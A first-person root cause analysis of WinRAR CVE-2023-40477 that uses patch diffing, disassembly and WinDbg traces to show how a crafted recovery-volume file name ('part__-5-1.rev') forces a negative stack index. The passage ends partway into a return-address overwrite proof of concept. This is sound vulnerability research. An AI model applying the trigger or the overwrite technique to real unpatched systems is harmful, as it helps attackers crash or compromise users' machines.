CVE-2023-40477 Root Cause Analysis

I’ve recently been looking at N-day vulnerabilities in Windows software in an attempt to hone my reverse engineering and exploit development skills. Last month, I read about an interesting bug in WinRAR versions 6.22 and below that could result in remote code execution. The bug was assigned CVE-2023-40477 and was reported by goodbyeselene through Trend Micro’s Zero Day Initiative (ZDI).

When I started, all the information I had to go on came from the ZDI page:

This vulnerability allows remote attackers to execute arbitrary code on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the processing of recovery volumes. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.

I also checked WinRAR’s changelog to see if there was any more information:

 3. Bugs fixed:

      a) a security issue involving out of bounds write is fixed
         in RAR4 recovery volumes processing code.

         We are thankful to goodbyeselene working with Trend Micro Zero Day
         Initiative for letting us know about this bug;

Not much to go on, but hopefully enough.

WinRAR Files

I installed both versions of WinRAR (the vulnerable 6.22 and the patched 6.23) in a Windows VM and copied all of the files from each version for comparison. Both versions come with several executables.

┌──(rick㉿archlap)-[~/Documents/Projects/CVE-2023-40477]
└─$ ls -l winRAR/6.22/*.exe
-rw-r--r-- 1 rick rick  644184 Aug 22 20:21 winRAR/6.22/Rar.exe
-rw-r--r-- 1 rick rick  184408 Aug 22 20:21 winRAR/6.22/RarExtInstaller.exe
-rw-r--r-- 1 rick rick  447576 Aug 22 20:21 winRAR/6.22/Uninstall.exe
-rw-r--r-- 1 rick rick  439384 Aug 22 20:21 winRAR/6.22/UnRAR.exe
-rw-r--r-- 1 rick rick 2573400 Aug 22 20:21 winRAR/6.22/WinRAR.exe

┌──(rick㉿archlap)-[~/Documents/Projects/CVE-2023-40477]
└─$ ls -l winRAR/6.23/*.exe
-rw-r--r-- 1 rick rick  644184 Aug 22 20:21 winRAR/6.23/Rar.exe
-rw-r--r-- 1 rick rick  184408 Aug 22 20:21 winRAR/6.23/RarExtInstaller.exe
-rw-r--r-- 1 rick rick  447576 Aug 22 20:21 winRAR/6.23/Uninstall.exe
-rw-r--r-- 1 rick rick  439896 Aug 22 20:21 winRAR/6.23/UnRAR.exe
-rw-r--r-- 1 rick rick 2574424 Aug 22 20:21 winRAR/6.23/WinRAR.exe

WinRAR Recovery Volumes

The ZDI page states that the vulnerability has something to do with processing “recovery volumes”. I’m no WinRAR expert, so I hadn’t heard of these before. After looking into it a bit, I found out that WinRAR can split an archive into multiple smaller parts and can also be configured to generate a number of “recovery volumes”. As an example, let’s say you use WinRAR to create an archive that is split into ten parts and include a single recovery volume. If you copy the archive files somewhere and one of the parts gets corrupted or lost, you can use the recovery volume to regenerate that part. If two parts are corrupted, you are out of luck unless you also generated two recovery volumes.
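The “one recovery volume fixes any one missing part” property is the same one a simple XOR parity block has. The Python sketch below is only an analogy, built on made-up, equal-length “parts”. RAR’s real recovery volumes use a Reed-Solomon code, which is what allows N recovery volumes to repair N missing parts. The function names are my own.

```python
from functools import reduce


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


def make_parity(parts: list[bytes]) -> bytes:
    """Build a single 'recovery' block as the XOR of all parts."""
    return reduce(xor_bytes, parts)


def rebuild_missing(surviving: list[bytes], parity: bytes) -> bytes:
    """Recover the one missing part by XORing the parity with every survivor."""
    return reduce(xor_bytes, surviving, parity)


parts = [b"part1...", b"part2...", b"part3..."]  # equal-length stand-ins for volumes
parity = make_parity(parts)
print(rebuild_missing([parts[0], parts[2]], parity))  # b'part2...'
```

With two parts missing, the single parity block has no way to tell their contributions apart. That is the XOR version of being “out of luck”.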

For testing, I downloaded a large ISO file and split it into a multi-part archive in RAR4 format.

WinRAR 1

I also added a single recovery volume.

WinRAR 2

I then renamed one of the parts so it wouldn’t be found during decompression and WinRAR would therefore have to use the recovery volume. Here’s an example of using the ‘rar’ command to reconstruct an archive:

c:\Program Files\WinRAR>rar rc c:\users\n00b\Downloads\BIGTEST.part1.rar

RAR 6.22 x64   Copyright (c) 1993-2023 Alexander Roshal   29 May 2023
Trial version             Type 'rar -?' for help

1 recovery volumes found
Calculating checksums of all volumes.
c:\users\n00b\Downloads\BIGTEST.part1.rar
c:\users\n00b\Downloads\BIGTEST.part2.rar
c:\users\n00b\Downloads\BIGTEST.part3.rar
c:\users\n00b\Downloads\BIGTEST.part4.rar
c:\users\n00b\Downloads\BIGTEST.part6.rar
c:\users\n00b\Downloads\BIGTEST.part1.rev
1 volumes missing
Reconstructing...
Creating c:\users\n00b\Downloads\BIGTEST.part5.rar 100%
Done

Patch Diffing

Next, I wanted to compare both versions of rar.exe to look for differences, hoping that the vulnerable code would be easy to spot among the changes. I used Ghidra and BinDiff to compare the two versions of rar.exe, and only five functions had changed.

Bindiff output

I set a breakpoint at each of the five changed functions and then ran a recovery operation on my test archive. I only got hits on two functions:

rar+0x4AAC4
rar+0x3F208

rar + 0x4AAC4

The first function was small and fairly simple:

Small function

The old version is on the right and the new version is on the left. The functions are almost identical, except for a new basic block added in the new version. In the original version, the function performs some dereferences and other calculations to derive a pointer, which it loads into RDI. It then tests that RDI is not zero and sets RAX to zero, so AL holds 0x00. The REP STOSB instruction stores the byte in AL at the address in RDI, then (with the direction flag clear) increments RDI and decrements RCX. It repeats until RCX reaches zero. In other words, it performs a memset of RCX zero bytes on some buffer.

The new version adds an extra basic block (in red on the left) that sets RCX from some other location. That suggested RCX might hold an invalid value in the old version, making REP STOSB run the wrong number of times. If RCX were too high, the loop would write zeros past the end of the buffer into adjacent memory, causing a buffer overflow.
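To make that concern concrete, here is a minimal Python model of REP STOSB. It assumes the direction flag is clear and uses a flat bytearray as a stand-in for memory. The buffer layout is hypothetical. It only shows how an RCX larger than the buffer spills zeros into whatever follows.

```python
def rep_stosb(memory: bytearray, rdi: int, rcx: int, al: int = 0) -> int:
    """Model REP STOSB with DF=0: store AL at [RDI], RDI += 1, RCX -= 1 until RCX == 0.

    `memory` is a hypothetical flat address space. Returns the final RDI.
    """
    while rcx != 0:
        memory[rdi] = al & 0xFF
        rdi += 1
        rcx -= 1
    return rdi


# Hypothetical layout: an 8-byte buffer at offset 0, followed by 8 bytes of other data.
BUF_START, BUF_SIZE = 0, 8

memory = bytearray(b"\xAA" * 8 + b"\xBB" * 8)
rep_stosb(memory, BUF_START, BUF_SIZE)      # correct count: only the buffer is cleared
print(memory.hex())  # 0000000000000000bbbbbbbbbbbbbbbb

memory = bytearray(b"\xAA" * 8 + b"\xBB" * 8)
rep_stosb(memory, BUF_START, BUF_SIZE + 4)  # oversized count: zeros spill past the buffer
print(memory.hex())  # 000000000000000000000000bbbbbbbb
```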

This could potentially be useful, but it’s very unlikely that you could overflow this specific buffer with only zeros and end up gaining remote code execution. More likely, you could only crash the process. I was hoping for something more interesting, and this was still only a guess at the problem, so I turned my attention to the other function at offset 0x3F208.

rar + 0x3F208

This function was much larger than the other and had small changes scattered throughout, though one section seemed to have changed more than the rest.

0x3F208

The red blocks near the top in the newer version introduce a series of checks that, if failed, all lead to the same exit point. Near the bottom, there’s a tan block that gained a new check, with its last nine instructions moved to after that check. This is where the vulnerability lies. After some reverse engineering of this block, here’s what I found:

.text:000000000003F7CC
.text:000000000003F7CC loc_3F7CC:              
.text:000000000003F7CC lea     rdx, [rbp+20490h+pRevFileName]       ; pRevFileName
.text:000000000003F7D0 mov     rcx, rdi                             ; Some kind of object with vtable
.text:000000000003F7D3 call    sub_24E64                            ; Get handle to REVobj and store in object at offset 0x08
.text:000000000003F7D8 mov     eax, dword ptr [rbp+20490h+var_6450] ; 1 for some reason
.text:000000000003F7DE add     eax, r13d                            ; r13d is 5 for some reason
.text:000000000003F7E1 cdqe                                         ; sign extend EAX into RAX
.text:000000000003F7E3 mov     [r12+rax*8-8], rdi                   ; r12 is a stack pointer
.text:000000000003F7E3                                              ; rdi is pointer to RevObject

R12 is a stack pointer. EAX was an unknown value (in my case it was set to 1). R13d was set to 5, but I didn’t know why at first. Those two values are added together and stored back into EAX. The result is then sign-extended into the RAX register. Then we hit the critical instruction:

.text:000000000003F7E3 mov     [r12+rax*8-8], rdi ; r12 is a stack pointer

The instruction computes R12+(RAX*8)-8 to get a destination address on the stack, then stores the value of RDI at that location. RDI contains a pointer to some custom object that seems to represent the recovery file. I wasn’t sure where EAX and R13D came from. If they could be manipulated into something very large, or even a negative number, I could point the destination somewhere unexpected and obtain an out of bounds write. This seemed like a juicy target. I just had to figure out where EAX and R13D came from and whether I could set them to something unexpected.
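The address arithmetic, including the 32-bit add and the CDQE sign extension, can be modelled in a few lines of Python. The helper names are my own. The R12 value is simply the one that shows up in the debugger later in this post, used here as an example input. A positive sum lands above R12; a negative one lands below it.

```python
MASK64 = (1 << 64) - 1


def cdqe(eax: int) -> int:
    """Sign-extend the low 32 bits of `eax` to a signed value, as CDQE does."""
    eax &= 0xFFFFFFFF
    return eax - (1 << 32) if eax & 0x80000000 else eax


def write_target(r12: int, eax: int, r13d: int) -> int:
    """Address written by `add eax, r13d` / `cdqe` / `mov [r12+rax*8-8], rdi`."""
    rax = cdqe(eax + r13d)              # 32-bit add, then sign extension to 64 bits
    return (r12 + rax * 8 - 8) & MASK64


R12 = 0x38CF2EEBB0                           # example value from a later debugger session
print(hex(write_target(R12, 1, 5)))           # 0x38cf2eebd8: R12 + 0x28
print(hex(write_target(R12, 1, 0xFFFFFFFB)))  # 0x38cf2eeb88: R12 - 0x28, below the base
```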

Working backwards through the basic blocks hit by my test archive file, I eventually came to the following block:

.text:000000000003F61A
.text:000000000003F61A loc_3F61A:              ; RAR object pointer
.text:000000000003F61A lea     rcx, [rbp+20490h+pRarObj]
.text:000000000003F621 call    sub_246C4       ; This func gets the number of parts from the REV
.text:000000000003F626 movzx   ecx, al
.text:000000000003F629 inc     ecx
.text:000000000003F62B mov     [rdi], ecx      ; 5
.text:000000000003F62D lea     rdi, [rdi-4]
.text:000000000003F631 sub     rsi, 1
.text:000000000003F635 jnz     short loc_3F61A

This block read certain bytes from the “.rev” recovery file and stored them into the variables used in the later calculations. Each value comes from a single byte that is zero-extended (movzx) and incremented by one before being stored. This meant that I could potentially modify the REV file to contain large values, which would cause an out of bounds write later on.

Modifying the REV File

After further reversing this function, I found that the two values were pulled from the very end of the REV file before any processing or decompression.

└─$ xxd BIGTEST2.part001.rev|tail -n3
003fffd0: 53eb 9b49 0d94 2fcb a94b 614a 7e5f cd01  S..I../..KaJ~_..
003fffe0: 9f7a f71f 2d9e 93ab d873 312a 6b97 3ceb  .z..-....s1*k.<.
003ffff0: 3f79 0058 dc92 b407 007b 0000 a269 ae09  ?y.X.....{...i..
                                ^^   ^^

I modified the file to include very large values:

└─$ xxd BIGTEST2.part001.rev|tail -n3
003fffd0: 53eb 9b49 0d94 2fcb a94b 614a 7e5f cd01  S..I../..KaJ~_..
003fffe0: 9f7a f71f 2d9e 93ab d873 312a 6b97 3ceb  .z..-....s1*k.<.
003ffff0: 3f79 0058 dc92 b407 aaff bbcc a269 ae09  ?y.X.........i..
                                ^^   ^^

Then I tried to use it to reconstruct my archive. Unfortunately, this led to a checksum error, and the vulnerable code was no longer hit.

RAR 6.22 x64   Copyright (c) 1993-2023 Alexander Roshal   29 May 2023
Trial version             Type 'rar -?' for help

Calculating checksums of all volumes.
C:\Users\n00b\Downloads\BIGTEST2.part001.rev
C:\Users\n00b\Downloads\BIGTEST2.part001.rev - checksum error
0 recovery volumes found

It turned out that the checksum comparison was done in the very next basic block.

.text:000000000003F658 lea     rax, [r14-4]
.text:000000000003F65C mov     [rsp+20590h+var_20568], ebx
.text:000000000003F660 mov     [rsp+20590h+var_20570], rax
.text:000000000003F665 mov     rax, [rsp+20590h+var_20540]
.text:000000000003F66A mov     r9d, [rax+93F0h]
.text:000000000003F671 xor     r8d, r8d
.text:000000000003F674 lea     rdx, [rsp+20590h+checksum]
.text:000000000003F679 lea     rcx, [rbp+20490h+pRarObj]
.text:000000000003F680 call    sub_251E4
.text:000000000003F685 cmp     esi, [rsp+20590h+checksum] ; Checksum comparison
.text:000000000003F689 jz      short loc_3F6D5

I used WinDbg to obtain the two checksum values being compared.

0:000> r rsi
rsi=0000000009ae69a2

0:000> dd rsp+44 L1
00000083`3d4cea04  58a7da77

Then I searched the REV file for these values. It turned out that the checksum is stored in the last four bytes of the REV file, in little-endian order. The bytes a2 69 ae 09 are the value 0x09ae69a2 found in RSI.

┌──(rick㉿archlap)-[~/…/Projects/CVE-2023-40477/rarFiles/modified]
└─$ xxd BIGTEST2.part001.rev|tail -n1
003ffff0: 3f79 0058 dc92 b407 aaff bbcc a269 ae09  ?y.X.........i..
                                        ^^^^ ^^^^

I then manually modified the file to include the correct checksum.

┌──(rick㉿archlap)-[~/…/Projects/CVE-2023-40477/rarFiles/modified]
└─$ xxd BIGTEST2.part001.rev|tail -n1
003ffff0: 3f79 0058 dc92 b407 aaff bbcc 77da a758  ?y.X........w..X
                                        ^^^^ ^^^^
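The hex edit above can be scripted, because the checksum is just a little-endian 32-bit integer at the end of the file. This sketch does not compute the checksum itself. The new value still comes from the debugger (0x58a7da77 here), exactly as in the manual process. The function names are my own.

```python
import struct


def stored_checksum(data: bytes) -> int:
    """Return the checksum kept in the last four bytes of a REV file (little-endian)."""
    (value,) = struct.unpack("<I", data[-4:])
    return value


def patch_checksum(data: bytes, new_value: int) -> bytes:
    """Return a copy of `data` with its trailing four-byte checksum replaced."""
    return data[:-4] + struct.pack("<I", new_value)


# The last line of the xxd dump of the modified file, before the checksum fix.
tail = bytes.fromhex("3f790058dc92b407aaffbbcca269ae09")
print(hex(stored_checksum(tail)))              # 0x9ae69a2
print(patch_checksum(tail, 0x58A7DA77).hex())  # 3f790058dc92b407aaffbbcc77daa758
```

To patch a real file, the same function can be applied to the whole file, for example `path.write_bytes(patch_checksum(path.read_bytes(), value))` with a `pathlib.Path`.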

Now I was passing the checksum validation routine, but I still didn’t hit the vulnerable code! It turned out that I was getting stuck at this block:

.text:000000000003F753
.text:000000000003F753 loc_3F753:
.text:000000000003F753 mov     edx, dword ptr [rbp+20490h+var_6450+4]
.text:000000000003F759 mov     ecx, [rbp+20490h+var_6448] 
.text:000000000003F75F lea     eax, [rdx+rcx]
.text:000000000003F762 cmp     eax, 0FFh
.text:000000000003F767 jg      loc_3F6A7

This block added up my two values and stored the sum in EAX, then checked that the total was no greater than 0xFF. This was a real bummer! The total had to be at most 0xFF (255 in decimal). The “jg” instruction jumps if EAX is greater than 0xFF, but it performs a signed comparison, so a negative value in EAX counts as less than 0xFF. In theory, then, if I could manipulate the values so that they add up to a negative number, I could still pass this check and obtain an out of bounds write.
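The difference between a signed and an unsigned comparison is easy to see in a small Python model of the check at 0x3F753. The function names are my own, and the inputs are illustrative values rather than ones taken from a real REV file. `passes_unsigned_check` shows what would have happened had the compiler emitted the unsigned `ja` instead of `jg`.

```python
def as_int32(value: int) -> int:
    """Interpret the low 32 bits of `value` as a signed two's-complement integer."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


def passes_ff_check(a: int, b: int) -> bool:
    """Model `lea eax, [rdx+rcx]` / `cmp eax, 0FFh` / `jg fail` (signed compare)."""
    return as_int32(a + b) <= 0xFF


def passes_unsigned_check(a: int, b: int) -> bool:
    """The same check if it had used JA (unsigned) instead of JG."""
    return ((a + b) & 0xFFFFFFFF) <= 0xFF


print(passes_ff_check(0x80, 0x80))   # False: 0x100 > 0xFF
print(passes_ff_check(-5, 1))        # True: -4 is below 0xFF when compared as signed
print(passes_unsigned_check(-5, 1))  # False: 0xFFFFFFFC is far above 0xFF
```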

Unfortunately, the routine that loaded these values from the file read only a single byte for each one and zero-extended it. Each value was therefore always positive, and no combination could add up to a negative number. However, hope was not lost!
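A quick brute force confirms the dead end. The sketch models the `movzx ecx, al` / `inc ecx` pair from the loop at 0x3F61A, so every byte becomes a value from 1 to 256. It then checks every possible pair of bytes. `value_from_byte` is a hypothetical helper name.

```python
def value_from_byte(b: int) -> int:
    """Model `movzx ecx, al; inc ecx`: a file byte becomes an unsigned value in 1..256."""
    return (b & 0xFF) + 1


sums = [value_from_byte(x) + value_from_byte(y) for x in range(256) for y in range(256)]
print(min(sums), max(sums))      # 2 512
print(any(s < 0 for s in sums))  # False
```

Even the largest sum (512) is nowhere near the 0x80000000 needed to look negative to the signed `jg`.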

Another Path

There are actually two primary code paths that lead to the 0xFF check block. These are shown in the below screenshot. One is outlined in a pink box on the right and the other outlined in blue on the left.

Two paths

My test archive had been taking me down the path to the right, where the values were read from inside the REV file itself. But there was this other path on the left that could lead us to the same check and ultimately the vulnerable code. Perhaps there was something useful in there? Right in the middle of that path is the following code block (colored yellow in the above screenshot).

.text:000000000003F71F
.text:000000000003F71F loc_3F71F:              
.text:000000000003F71F mov     rcx, r15
.text:000000000003F722 call    charToInt
.text:000000000003F727 mov     dword ptr [rbp+rsi*4+20490h+var_6450], eax
.text:000000000003F72E test    eax, eax
.text:000000000003F730 jz      short loc_3F739

This basic block is used as part of a process that reads the recovery volume’s file name. It starts at the end of the string, just before the “.rev” extension, and works backward. Let’s take a look at the “charToInt” function. Note that I named the function myself; that’s not its actual name.

charToInt

It’s not very large, so it wasn’t too difficult to follow. When this function is called, RCX points into a Unicode (UTF-16) string holding the full file path and file name, at the position of the number being parsed. For this example, let’s say the file name is “BIGTEST2.part001.rev”. Let’s look at the first basic block.

.text:00000000000508F4 sub_508F4 proc near
.text:00000000000508F4 movzx   edx, word ptr [rcx]
.text:00000000000508F7 xor     r8b, r8b
.text:00000000000508FA cmp     dx, 2Dh ; '-'
.text:00000000000508FE jnz     short loc_50907

It first reads the first WORD of the string into EDX, zero-extending it. Since the string is Unicode (UTF-16LE), each character takes two bytes. An ASCII character such as “1” is stored as 0x31 followed by 0x00, so DX simply holds 0x0031. Next, R8B is set to 0x0. Then the function checks whether the character is ‘-’. If the character were a hyphen, we would not take the jump and would hit the next basic block:

.text:0000000000050900 movzx   edx, word ptr [rcx+2]
.text:0000000000050904 mov     r8b, 1

This block would load the next character into EDX and set R8B to 1. In our case, the character is not a hyphen, so we take the jump, skip that block, and land at the next one.

.text:0000000000050907 loc_50907:
.text:0000000000050907 lea     r9, [rcx+2]
.text:000000000005090B cmovnz  r9, rcx
.text:000000000005090F xor     eax, eax
.text:0000000000050911 jmp     short loc_50930

If a hyphen was not found earlier, the pointer to the current character (RCX) is copied into R9. If a hyphen was found, the pointer to the next character (RCX+2) is used instead. Then EAX is zeroed out, and we jump into the beginning of a loop.

.text:0000000000050930 cmp     dx, 30h ; '0'
.text:0000000000050934 jnb     short loc_50913

This block checks whether the current character in DX is below 0x30, the ASCII code for ‘0’. If it is, we exit the loop. If not, we hit another check in the next block.

.text:0000000000050913 cmp     dx, 39h ; '9'
.text:0000000000050917 ja      short loc_50936

This block checks the current character to see if it’s above 0x39, which is the ASCII code for ‘9’. If so, we exit the loop. If not, we continue on.

.text:0000000000050919 lea     rcx, [rax+rax*4]
.text:000000000005091D movzx   eax, dx
.text:0000000000050920 lea     rax, [rax+rcx*2]
.text:0000000000050924 add     rax, 0FFFFFFFFFFFFFFD0h
.text:0000000000050928 add     r9, 2
.text:000000000005092C movzx   edx, word ptr [r9]

The first instruction computes RAX+RAX*4 and stores the result in RCX. In this case, RAX is zero, so RCX becomes zero. Next, the current character is zero-extended into EAX. The function then computes RAX+RCX*2 and stores the result back into RAX. Here, RAX holds 0x31 (“1”), so the result is 0x31 + 0*2 = 0x31. The next instruction adds 0xFFFFFFFFFFFFFFD0 to RAX, which is the same as subtracting 0x30, so 0x31 becomes 0x1. It’s essentially converting the ASCII “1” to the integer 1.

Taken together, each iteration computes RAX = RAX*10 + (character - 0x30), which accumulates a decimal number one digit at a time. The function then adds 2 to R9, copies the next Unicode character into EDX, and starts the loop over. This continues until it finds a character that’s not between 0 and 9. Once it exits, we hit this block:

.text:0000000000050936 test    r8b, r8b
.text:0000000000050939 jz      short locret_50943

It checks to see if r8b is still set to zero. If so, we jump to the final basic block. If not, we hit a different one instead:

.text:000000000005093B test    rax, rax
.text:000000000005093E js      short locret_50943

This block checks whether RAX is already negative (TEST sets the sign flag from RAX’s top bit). If so, it jumps to the end. If not, we hit one final basic block:

.text:0000000000050940 neg     rax

This block simply negates the RAX register. So a string of “-1” would become the actual integer -1. We then reach the final block.

.text:0000000000050943 locret_50943:
.text:0000000000050943 retn
.text:0000000000050943 sub_508F4 endp

It simply returns the value in the RAX register. Go back to our example, “BIGTEST2.part001.rev”. The caller walks backward from the extension over the digits and stops at the “t”. This function then parses “001” forward, stops at the “.” of the extension, and returns 1 in RAX. What would happen if we renamed the file to “BIGTEST2.part-10.rev”? RAX would contain the actual value -10, or 0xffffffff`fffffff6. A negative value! Just what I needed! This turned out to be the crux of this vulnerability.
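Here is the whole routine as a Python sketch. It works directly on UTF-16LE bytes and reads one WORD per character, like `movzx edx, word ptr [rcx]`. It assumes the caller passes the byte offset where the number starts. `char_to_int` mirrors my own name for the function, not its real one. Running off the end of the buffer is treated like hitting the terminating NUL.

```python
import struct


def char_to_int(buf: bytes, offset: int = 0) -> int:
    """Python model of the routine at rar+0x508F4 ('charToInt').

    `buf` holds a UTF-16LE string; `offset` is the byte offset of the number.
    """
    def word(pos: int) -> int:
        # Past the end of the buffer behaves like the NUL terminator (a non-digit).
        return struct.unpack_from("<H", buf, pos)[0] if pos + 2 <= len(buf) else 0

    negative = word(offset) == 0x2D          # leading '-' sets R8B
    pos = offset + 2 if negative else offset
    value = 0
    ch = word(pos)
    while 0x30 <= ch <= 0x39:                # '0'..'9'
        value = value * 10 + (ch - 0x30)     # rax = rax*10 + (ch - 0x30)
        pos += 2
        ch = word(pos)
    # The real code skips NEG if RAX already has its sign bit set (64-bit overflow);
    # Python ints do not overflow, so that case cannot arise here.
    return -value if negative else value


name = "001.rev".encode("utf-16-le")
print(name[:2].hex())                       # 3000: '0' is stored as 0x30, then 0x00
print(char_to_int(name))                    # 1
neg = char_to_int("-10.rev".encode("utf-16-le"))
print(neg, hex(neg & 0xFFFFFFFFFFFFFFFF))   # -10 0xfffffffffffffff6
```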

My next problem was that my test archive wasn’t actually hitting this code path. There was a check earlier on that I kept failing. Up to this point, I had been modifying registers in WinDbg to force execution down this path, so I could reverse engineer the code and see whether it was exploitable. I had to figure out why I wasn’t hitting this code path and whether I could force the program to take this route instead.

The DIL Check

The decision of which path to take boiled down to this tiny code block:

.text:000000000003F591 loc_3F591:
.text:000000000003F591 test    dil, dil
.text:000000000003F594 jz      loc_3F6E3

If the DIL register is 0, the jump is taken to the left side of the code graph and down the path to the vulnerable code. If not, the program takes the other path, where it reads the values from inside the REV file. I needed to find a way to ensure DIL was zero. Zooming out in the IDA graph a bit, we see this:

Small loop

The very first instruction at the top sets the DIL register to 1. I needed to find some code that could change it to zero. The second-to-last block in the screenshot above has some code that can do this.

.text:000000000003F583 loc_3F583:
.text:000000000003F583 movzx   edi, dil
.text:000000000003F587 cmp     edx, 2
.text:000000000003F58A cmovz   edi, ebx
.text:000000000003F58D mov     [rsp+20590h+var_20550], edi

This block compares the value in EDX to 2. If EDX equals 2, it copies EBX into EDI (which also sets DIL). EBX always seemed to be zero. This was the only location I found that could set DIL to zero, so my next task was figuring out how to get EDX set to 2. Let’s look at the first basic block again.

.text:000000000003F537 mov     dil, 1
.text:000000000003F53A mov     [rsp+20590h+var_20550], edi
.text:000000000003F53E lea     rcx, [rbp+20490h+revFileName]
.text:000000000003F542 call    sub_3721C
.text:000000000003F547 mov     rcx, rax
.text:000000000003F54A test    rax, rax
.text:000000000003F54D jz      short loc_3F591

The function call in the middle of this block locates the last “.” character in the file name string via a nested call to wcsrchr, and returns a pointer to that character within the string. That pointer is moved into RCX. If the pointer is not null, execution falls through to the next block.

.text:000000000003F54F mov     edx, ebx
.text:000000000003F551 sub     rcx, 2
.text:000000000003F555 lea     rax, [rbp+20490h+revFileName]
.text:000000000003F559 cmp     rcx, rax
.text:000000000003F55C jbe     short loc_3F591

Here, EDX is set to zero because EBX is also zero. This is important, because EDX is the counter that ultimately needs to equal 2 for us to pass our check later on! The Unicode string pointer in RCX is reduced by two, so it points to the character just before the file extension begins. The block then checks that this location is past the beginning of the string. If it is, we continue to the next block, where we enter a small loop.

.text:000000000003F55E loc_3F55E:
.text:000000000003F55E movzx   r8d, word ptr [rcx]
.text:000000000003F562 cmp     r8w, 2Eh ; '.'
.text:000000000003F567 jz      short loc_3F583

This block checks the current character to see if it is another period. If it is, we exit the loop. If not, we continue to the next block in the loop.

.text:000000000003F569 sub     rcx, 2
.text:000000000003F56D lea     eax, [rdx+1]
.text:000000000003F570 cmp     r8w, 5Fh ; '_'
.text:000000000003F575 cmovnz  eax, edx
.text:000000000003F578 mov     edx, eax
.text:000000000003F57A lea     rax, [rbp+20490h+revFileName]
.text:000000000003F57E cmp     rcx, rax
.text:000000000003F581 ja      short loc_3F55E

The string pointer in RCX is decremented by two to move to the previous character. Then 1 is added to the value in EDX (zero on the first pass), and the result is stored in EAX. Next, the current character in R8W is compared to an underscore. If it is not an underscore, EDX is copied into EAX, discarding the incremented value. Then EAX is copied back into EDX.

This is the important bit! If an underscore had been found, EAX would still hold EDX+1, and the “mov EDX, EAX” instruction would copy that incremented count back into EDX. If no underscore is found, EDX keeps its old value.

Finally, it checks whether we’ve reached the very beginning of the file name string and run out of characters. If so, we exit the loop and reach our check block. If not, we loop again.

If you follow this loop through, you’ll see that it’s essentially just counting the underscore characters between the file extension and the preceding period (or the start of the string). The count is kept in the EDX register. To pass our check in the next block, we therefore need exactly two underscores in that part of the file name. That sets EDX to 2, which sets DIL to zero, which makes the program choose the vulnerable code path!
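The path selection can be modelled in Python. The sketch assumes, as described above, that the search starts from the last “.” in the full path. Like the `ja` bound check, it never examines the very first character. The helper names are hypothetical.

```python
def underscore_count(path: str) -> int:
    """Model of the loop at rar+0x3F537..0x3F581 (helper name is my own).

    Start at the character before the last '.', walk backward counting '_'
    until another '.' is found or the start of the string is reached.
    """
    dot = path.rfind(".")          # sub_3721C: pointer to the last '.'
    if dot == -1:
        return 0                   # NULL pointer: straight to the DIL test, DIL stays 1
    count = 0
    i = dot - 1
    while i > 0:                   # index 0 is never examined, like the RCX > start check
        ch = path[i]
        if ch == ".":              # loc_3F55E: stop at the previous period
            break
        if ch == "_":              # cmovnz keeps EDX+1 only for '_'
            count += 1
        i -= 1
    return count


def takes_filename_path(path: str) -> bool:
    """DIL becomes 0 (the path that parses numbers from the name) only for exactly two '_'."""
    return underscore_count(path) == 2


for name in (r"C:\Users\n00b\Downloads\BIGTEST2.part001.rev",
             r"C:\Users\n00b\Downloads\BIGTEST2.part__-5-1.rev"):
    print(underscore_count(name), takes_filename_path(name))
# 0 False
# 2 True
```

Because the walk stops at the previous period, underscores in the directory part of the path do not count, as long as the base name contains a “.”.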

Out of Bounds Write

Now we have all the information we need to perform an out of bounds write. Let’s test it! I’ll rename the REV file to something that should trigger the vulnerable code.

BIGTEST2.part__-5-1.rev

This should theoretically cause us to end up with a negative number in RAX where the stack write happens here:

.text:000000000003F7D8 mov     eax, dword ptr [rbp+20490h+var_6450]
.text:000000000003F7DE add     eax, r13d
.text:000000000003F7E1 cdqe
.text:000000000003F7E3 mov     [r12+rax*8-8], rdi

I set a breakpoint in WinDbg at the rar+3F7D8 instruction and attempted to recover the archive with my malformed recovery volume file name.

0:000> bp rar+3F7D8
0:000> g

Breakpoint 0 hit
RAR+0x3f7d8:
00007ff6`6699f7d8 8b8540a00100    mov     eax,dword ptr [rbp+1A040h] ss:00000038`cf2e86b0=00000001

0:000> p
RAR+0x3f7de:
00007ff6`6699f7de 4103c5          add     eax,r13d

0:000> r eax
eax=1

0:000> r r13d
r13d=fffffffb

0:000> p
RAR+0x3f7e1:

00007ff6`6699f7e1 4898            cdqe

0:000> r rax
rax=00000000fffffffc

0:000> p
RAR+0x3f7e3:
00007ff6`6699f7e3 49897cc4f8      mov     qword ptr [r12+rax*8-8],rdi ds:00000038`cf2eeb88=0000000000000000

0:000> r rax
rax=fffffffffffffffc

Success! EAX contained the “1” part of my file name string, and R13D contained the “-5”. When they are added together, RAX contains a negative number. Now I could move the destination address of the write in an unexpected way to achieve an out of bounds write!

0:000> ?r12 + (rax*8) - 8
Evaluate expression: 243994127240 = 00000038`cf2eeb88

0:000> r rsp
rsp=00000038cf2ce570

Return Address Overwrite PoC

The next question is where to write. I don’t control the contents of the RDI register. No matter what I do, I can only write a pointer to the REV object to the chosen location, which is of limited use. As a proof of concept, though, I can make rar.exe crash by overwriting a return address on the stack with the RDI pointer.

Let’s look at the call stack at the time that the overwrite takes place.

0:000> k
 # Child-SP          RetAddr               Call Site
00 00000038`cf2ce570 00007ff6`6699ef05     RAR+0x3f7e3
01 00000038`cf2eeb10 00007ff6`669767de     RAR+0x3ef05
02 00000038`cf2f7440 00007ff6`6699b2cd     RAR+0x167de
03 00000038`cf2ff8c0 00007ff6`669bd618     RAR+0x3b2cd
04 00000038`cf2ff900 00007ffd`07567614     RAR+0x5d618
05 00000038`cf2ff940 00007ffd`07d626a1     KERNEL32!BaseThreadInitThunk+0x14
06 00000038`cf2ff970 00000000`00000000     ntdll!RtlUserThreadStart+0x21

Now let’s check the base value in R12:

0:000> r r12
r12=00000038cf2eebb0

Let’s choose the closest return address pointer on the stack to our R12 value and subtract the two values to figure out the distance.

0:000> dqs 00000038`cf2eeb08 L2
00000038`cf2eeb08  00007ff6`6699ef05 RAR+0x3ef05    <-- Return address pointer
00000038`cf2eeb10  00000038`cf2eebb0

0:000> ?r12 - 00000038`cf2eeb08
Evaluate expression: 168 = 00000000`000000a8

I need to subtract 0xa8 from R12 in order to overwrite the return address. I know that the value of RAX will be multiplied by 8 and then have 8 subtracted, so I’ll just reverse the process.

